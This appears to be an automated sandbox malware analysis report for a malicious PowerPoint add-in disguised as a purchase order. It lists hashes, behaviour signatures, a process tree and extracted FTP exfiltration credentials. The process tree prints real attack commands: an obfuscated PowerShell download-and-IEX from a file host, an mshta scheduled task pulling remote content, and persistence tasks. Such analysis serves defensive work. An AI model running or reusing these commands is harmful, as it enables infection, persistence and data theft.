14b25b8d5c181fc6aeb59ad3c7170575201070a52c5428ca6c6a57fca295595c

Analysis

max time kernel
142s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2022 08:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Purchase Order_3_812937_pdf.ppam
Size

42KB
MD5

38fdfc043596f30da30ffd84a5e8bc3f
SHA1

a0e0c82a7614a2528b84b2d42153f4b52cbe2302
SHA256

14b25b8d5c181fc6aeb59ad3c7170575201070a52c5428ca6c6a57fca295595c
SHA512

139166ad594fcab5ad8be8526eb3d006d0c4a5480e924a86ceb291f2cedfbb3ee962966632fc6d8a23bafb939077158313c0300fb47d2e5b7f200f20518f27b1
SSDEEP

768:JJ/c/lsTsK/n/Okf6R9/i/LIlfKEe89Vva6PdYI4+zMZvJA0FHwZH+T6gXJ1gxPZ:Pkt09fmj7ajsurtPgxP6ZD1/K8Nytsdk

Score

10^/10

collection

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
107.182.129.168
Port:
21
Username:
ashgdhfg3
Password:
jfghfjgh545

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4848	3368	wscript.exe	POWERPNT.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

24 1420 powershell.exe
28 1420 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

jsc.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe

flow	pid	process
24	1420	powershell.exe
28	1420	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 3 IoCs

Processes:

POWERPNT.EXEWScript.exe

description	ioc	process
File created	C:\Users\Admin\appData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js	POWERPNT.EXE
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helloitsindian.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helloitsindian.vbs	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 804 set thread context of 3376	804	powershell.exe	jsc.exe
PID 804 set thread context of 3916	804	powershell.exe	caspol.exe
PID 804 set thread context of 4008	804	powershell.exe	Msbuild.exe

Drops file in Windows directory 2 IoCs

Processes:

dw20.exedw20.exe

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	dw20.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	dw20.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dw20.exePOWERPNT.EXEdw20.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5096 schtasks.exe
2312 schtasks.exe
3784 schtasks.exe

pid	process
5096	schtasks.exe
2312	schtasks.exe
3784	schtasks.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

dw20.exePOWERPNT.EXEdw20.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe

Modifies registry class 1 IoCs

Processes:

WScript.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings WScript.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

308 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3368 POWERPNT.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	WScript.exe

pid	process
308	PING.EXE

pid	process
3368	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exejsc.exe

pid	process
1420	powershell.exe
1420	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
3376	jsc.exe
3376	jsc.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowershell.exedw20.exedw20.exejsc.exe

description	pid	process
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeRestorePrivilege	2396	dw20.exe
Token: SeBackupPrivilege	2396	dw20.exe
Token: SeRestorePrivilege	1632	dw20.exe
Token: SeBackupPrivilege	1632	dw20.exe
Token: SeBackupPrivilege	2396	dw20.exe
Token: SeBackupPrivilege	1632	dw20.exe
Token: SeBackupPrivilege	2396	dw20.exe
Token: SeBackupPrivilege	2396	dw20.exe
Token: SeBackupPrivilege	1632	dw20.exe
Token: SeBackupPrivilege	1632	dw20.exe
Token: SeDebugPrivilege	3376	jsc.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

POWERPNT.EXEjsc.exe

pid process

3368 POWERPNT.EXE
3368 POWERPNT.EXE
3368 POWERPNT.EXE
3376 jsc.exe

pid	process
3368	POWERPNT.EXE
3368	POWERPNT.EXE
3368	POWERPNT.EXE
3376	jsc.exe

Suspicious use of WriteProcessMemory 57 IoCs

Processes:

POWERPNT.EXEwscript.exepowershell.exeWScript.exeWScript.execmd.exepowershell.execaspol.exeMsbuild.execsc.exe

description	pid	process	target process
PID 3368 wrote to memory of 4848	3368	POWERPNT.EXE	wscript.exe
PID 3368 wrote to memory of 4848	3368	POWERPNT.EXE	wscript.exe
PID 4848 wrote to memory of 1420	4848	wscript.exe	powershell.exe
PID 4848 wrote to memory of 1420	4848	wscript.exe	powershell.exe
PID 4848 wrote to memory of 5096	4848	wscript.exe	schtasks.exe
PID 4848 wrote to memory of 5096	4848	wscript.exe	schtasks.exe
PID 1420 wrote to memory of 32	1420	powershell.exe	WScript.exe
PID 1420 wrote to memory of 32	1420	powershell.exe	WScript.exe
PID 1420 wrote to memory of 308	1420	powershell.exe	PING.EXE
PID 1420 wrote to memory of 308	1420	powershell.exe	PING.EXE
PID 32 wrote to memory of 1840	32	WScript.exe	WScript.exe
PID 32 wrote to memory of 1840	32	WScript.exe	WScript.exe
PID 32 wrote to memory of 2260	32	WScript.exe	cmd.exe
PID 32 wrote to memory of 2260	32	WScript.exe	cmd.exe
PID 1840 wrote to memory of 2312	1840	WScript.exe	schtasks.exe
PID 1840 wrote to memory of 2312	1840	WScript.exe	schtasks.exe
PID 1840 wrote to memory of 3784	1840	WScript.exe	schtasks.exe
PID 1840 wrote to memory of 3784	1840	WScript.exe	schtasks.exe
PID 2260 wrote to memory of 804	2260	cmd.exe	powershell.exe
PID 2260 wrote to memory of 804	2260	cmd.exe	powershell.exe
PID 804 wrote to memory of 4536	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 4536	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 4536	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3376	804	powershell.exe	jsc.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 3916	804	powershell.exe	caspol.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 804 wrote to memory of 4008	804	powershell.exe	Msbuild.exe
PID 3916 wrote to memory of 2396	3916	caspol.exe	dw20.exe
PID 3916 wrote to memory of 2396	3916	caspol.exe	dw20.exe
PID 3916 wrote to memory of 2396	3916	caspol.exe	dw20.exe
PID 4008 wrote to memory of 1632	4008	Msbuild.exe	dw20.exe
PID 4008 wrote to memory of 1632	4008	Msbuild.exe	dw20.exe
PID 4008 wrote to memory of 1632	4008	Msbuild.exe	dw20.exe
PID 804 wrote to memory of 1072	804	powershell.exe	csc.exe
PID 804 wrote to memory of 1072	804	powershell.exe	csc.exe
PID 1072 wrote to memory of 420	1072	csc.exe	cvtres.exe
PID 1072 wrote to memory of 420	1072	csc.exe	cvtres.exe

outlook_office_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

outlook_win_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase Order_3_812937_pdf.ppam" /ou ""
1⤵
- Drops startup file
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3368

C:\Windows\SYSTEM32\wscript.exe
wscript.exe //b //e:jscript C:\\Users\\Public\\sys.ini
2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP B -C (I'w'r('https://www.mediafire.com/file/8r7icojiklwsrsj/3.txt/file') -useB) | .('{#}{_}'.replace('_','0').replace('#','1')-f'^#','>').replace('>','I').replace('^','E').replace('#','X') | ping 127.0.0.1
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"
4⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\JIGIJIGI.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 120 /tn Appligation /F /tr "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"
6⤵
- Creates scheduled task(s)
PID:2312

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 45 /tn ChromiumPluginupdate /F /tr "C:\ProgramData\holatyrimakachola\ChromeExtentionUpdate.vbs"
6⤵
- Creates scheduled task(s)
PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\holatyrimakachola\JIGIJIGI.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\holatyrimakachola\GOLGAPORA.PS1
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
7⤵
PID:4536

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
7⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3376

C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:3916

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 776
8⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 776
8⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5zl42hu\l5zl42hu.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES68C7.tmp" "c:\Users\Admin\AppData\Local\Temp\l5zl42hu\CSC9D5B50278048451983D42056E49267D.TMP"
8⤵
PID:420

C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
4⤵
- Runs ping.exe
PID:308

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn MicrosoftUpdater /F /tr """Mshta""""""http://www.3kjkfgjfkg.blogspot.com/atom.xml"""
3⤵
- Creates scheduled task(s)
PID:5096

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB8C.tmp.xml
Filesize
4KB

MD5
a633ac25d3e8c67ef5aac54fdd352668

SHA1
2fbcdb9d89400bd18c3e356e9869a5abc8dbc3d6

SHA256
0fd98032dea82954acabd5b740ac6453e31248fb991bcf4d7c593d4e546ea270

SHA512
3c9e8d2c92c4f3539ca83df4a7509e2eab584644cddb45d8d2db3feb2fd789334060f2b453ca18982194bcc49af6d7c4a4134d6338580bd31304452330fe51f7

Download Submit
C:\ProgramData\holatyrimakachola\GOLGAPORA.PS1
Filesize
1.1MB

MD5
603bffe09d8f6c58499a83212f5febac

SHA1
f6616cdfbe8b06b5ee4f95cfee0ed15b74b59466

SHA256
d7fe1e3c8d18c2f992dfad7fabfb8f9907786eaca269dbc73593801c7474bd13

SHA512
788b7cd546c4557fdbbab8a5048f62838106e592836a9616f19cf82759b6486207912f8787ddf5465a4d5ec4d567776cab701b2c1e5b63980c9245ee51884346

Download Submit
C:\ProgramData\holatyrimakachola\JIGIJIGI.bat
Filesize
105B

MD5
7f53280ea46314479ed1d63b7d9625eb

SHA1
9a045c31da18e934b1ca4ce27b72daf0cbbd87fe

SHA256
88bc996293478f62bb28814b1787c278a6dc0ed20fe8b11e3f644985b6514459

SHA512
275868f4214bc8b874ec857f8938fc35fb77ef025596e1e0cdbea2d231864bec8c4ae09fb557c8dcbe95131c10962cc11744b210f1ec0c111db663fa27a7dbf3

Download Submit
C:\ProgramData\holatyrimakachola\JIGIJIGI.vbs
Filesize
562B

MD5
8ea0ee4f4d6ccbabe4117cdd6f974011

SHA1
3271a608993c307046b3185c9a21d434d39fb19c

SHA256
cfed6df2d13d6a842032d23d0b12429ca0ddb4ef2bba89f096a05ba44516c620

SHA512
5b10ff90b6560956670c85f33266384f4ed401845e137e356ff15e4d613a6a6cc6ff42e68ccde85e0c49d58b7c20f25132ece60a2b60977dd1b3066e59cca61e

Download Submit
C:\ProgramData\holatyrimakachola\helloitsindian.vbs
Filesize
387B

MD5
f0ca1358f7cbc07ffadcdcbb09a8096e

SHA1
a1839290fb16f5ccfbcbeec71bcfa4afaa842eaa

SHA256
b964c3f6be44ac474f116783e4ca950b909109ff7ea1cf9db9a879a29beeae43

SHA512
60fe0ab41793a5fd89a5ffad088a46b0cc8c4db06b8180446e1a4d036c7f81faf35fa726bc9f7b4231b99946ac3c99ae659b4e5a7611e10da2d86344fa620d2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3b339db76539f93ffdb0225c86257ba8

SHA1
95183379b568f947dcd14718561342fc88a474c3

SHA256
2b8ba45ac68edf60711c95e6debe3a07a592734415cc53c68ca485787828e84c

SHA512
1a4d340df34c96834f1868402489b93ca0aedd71d88d970b17a8d7a58428145e00b308fde2a91ae91d51a787cabcbd105b6210a2bffe2fd483a543793f5a57d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES68C7.tmp
Filesize
1KB

MD5
f297cf5a7c09a0712f506afe3562a000

SHA1
104939ee9edb7600d79caf5c748b70663a61fc45

SHA256
b9e90aa55b02ce564d311dfce5aa671a55bf0edfde61989df57729c3acc3d547

SHA512
d13a14208f0f1072bb772c761864d7ff78117fc2552c77386d6b3e3c111eef6b297e5f06760a1ecf292ce5c1308ab9773bf05b4a8b2b54f9c2708b6937e9f647

Download Submit
C:\Users\Admin\AppData\Local\Temp\l5zl42hu\l5zl42hu.dll
Filesize
3KB

MD5
a65a682e32520d2b1d51ee42652d63bb

SHA1
e7d0cb3e8b9d8f74dfa729446e659f48f1e8613d

SHA256
0a02287c510835d2a6f8a3d47eff043653d0f35939b8744d2461b1ab268a9c55

SHA512
3cbb9b954b7b494023a29e26f5323d9c768955b5fd40ba63814ad14ce42cc7ec045bcb0ab2381a53cfab25d3c415ebe51a11f1c68601706290d549e527534376

Download Submit
C:\Users\Public\sys.ini
Filesize
2KB

MD5
b9cd455488d6fc8b7bcd19a5511cdda9

SHA1
e7845dc2407ebb1c0979f5b9110ed1b574f1fe6a

SHA256
0cf557395affed72ba56aa83a44facad9deb24b0f2ebeb70438e9938a0ce3dc3

SHA512
5f6c6215a17844fd46c75633d20c83ef9331deff477328780249578bfbfb92f3f9a9d68ac6365902b25aaf5eb18cecc7362ea04e7aceb82e5cb8df5b8286b7ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l5zl42hu\CSC9D5B50278048451983D42056E49267D.TMP
Filesize
652B

MD5
df60339e5a1b67983f2c383ba53fd820

SHA1
3e1a632ca55376d6591412cfdcbc9cde67e0a6b4

SHA256
e4406f307af902540565f5006cb7f5e072c60c4e0b1aff82c6626e625788be02

SHA512
2659734c45cc37e03ef7cf79e175ccc43b7ae4147c71ee5b6a8f43a2a6e9b4d0b668c9320022c6fab0d81dc1f007c277272aec1b5ff6034e5a80be253faefc02

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l5zl42hu\l5zl42hu.0.cs
Filesize
424B

MD5
d05db7ca65c16470a87f4c4007e9e026

SHA1
ab4a5e6b4fbc331c345d88c39239f003f8dd3da7

SHA256
c1412a0d2269b59df9d6b003b2f82f9479040dae4c4e12629db5845a6ac4c960

SHA512
825d664f3df2ad4ef8b1e501e6a99aaae7d54db59b9308c34ad3d64b07a6792412beded53919ea8bf9e137f4a7e8aa7ac388a036ab256a1cce201a208ef311cb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l5zl42hu\l5zl42hu.cmdline
Filesize
369B

MD5
bd2081f26501c1fc6bbc08ccde453f93

SHA1
62d0da08c876ff2d451ff1f11fb28a9f9b1077ab

SHA256
ef2757dd177783624e18ff5c8bc29c208271dc59cf463ea32d6e416101dce2dc

SHA512
4fe739bd3aafa8cf843719c91838705c853ebebfc4373ca6687e127ca90a8806946a59f6984af84f7d56cd8b6615fb7d77c1f32f1a237df967f6b46096c54bcc

Download Submit
memory/32-150-0x0000000000000000-mapping.dmp

Download
memory/308-151-0x0000000000000000-mapping.dmp

Download
memory/420-188-0x0000000000000000-mapping.dmp

Download
memory/804-160-0x0000000000000000-mapping.dmp

Download
memory/804-162-0x00007FF9F8860000-0x00007FF9F9321000-memory.dmp

Filesize
10.8MB

Download
memory/804-165-0x00007FF9F8860000-0x00007FF9F9321000-memory.dmp

Filesize
10.8MB

Download
memory/1072-185-0x0000000000000000-mapping.dmp

Download
memory/1420-153-0x00007FF9F8860000-0x00007FF9F9321000-memory.dmp

Filesize
10.8MB

Download
memory/1420-145-0x00007FF9F8860000-0x00007FF9F9321000-memory.dmp

Filesize
10.8MB

Download
memory/1420-142-0x000001F5D2BE0000-0x000001F5D2C02000-memory.dmp

Filesize
136KB

Download
memory/1420-141-0x0000000000000000-mapping.dmp

Download
memory/1420-161-0x00007FF9F8860000-0x00007FF9F9321000-memory.dmp

Filesize
10.8MB

Download
memory/1632-173-0x0000000000000000-mapping.dmp

Download
memory/1840-155-0x0000000000000000-mapping.dmp

Download
memory/2260-157-0x0000000000000000-mapping.dmp

Download
memory/2312-158-0x0000000000000000-mapping.dmp

Download
memory/2396-172-0x0000000000000000-mapping.dmp

Download
memory/3368-147-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-135-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-149-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-148-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-138-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp

Filesize
64KB

Download
memory/3368-136-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-137-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp

Filesize
64KB

Download
memory/3368-134-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-132-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-146-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3368-133-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3376-174-0x0000000005AF0000-0x0000000006094000-memory.dmp

Filesize
5.6MB

Download
memory/3376-178-0x0000000005540000-0x00000000055DC000-memory.dmp

Filesize
624KB

Download
memory/3376-180-0x00000000055E0000-0x0000000005646000-memory.dmp

Filesize
408KB

Download
memory/3376-179-0x0000000005680000-0x0000000005712000-memory.dmp

Filesize
584KB

Download
memory/3376-183-0x0000000006A50000-0x0000000006AA0000-memory.dmp

Filesize
320KB

Download
memory/3376-184-0x0000000006F10000-0x0000000006F1A000-memory.dmp

Filesize
40KB

Download
memory/3376-167-0x000000000047DA9E-mapping.dmp

Download
memory/3376-166-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3784-159-0x0000000000000000-mapping.dmp

Download
memory/3916-176-0x00000000744E0000-0x0000000074A91000-memory.dmp

Filesize
5.7MB

Download
memory/3916-182-0x00000000744E0000-0x0000000074A91000-memory.dmp

Filesize
5.7MB

Download
memory/3916-169-0x000000000047DA9E-mapping.dmp

Download
memory/4008-171-0x000000000047DA9E-mapping.dmp

Download
memory/4008-181-0x00000000744E0000-0x0000000074A91000-memory.dmp

Filesize
5.7MB

Download
memory/4008-175-0x00000000744E0000-0x0000000074A91000-memory.dmp

Filesize
5.7MB

Download
memory/4848-139-0x0000000000000000-mapping.dmp

Download
memory/5096-144-0x0000000000000000-mapping.dmp

Download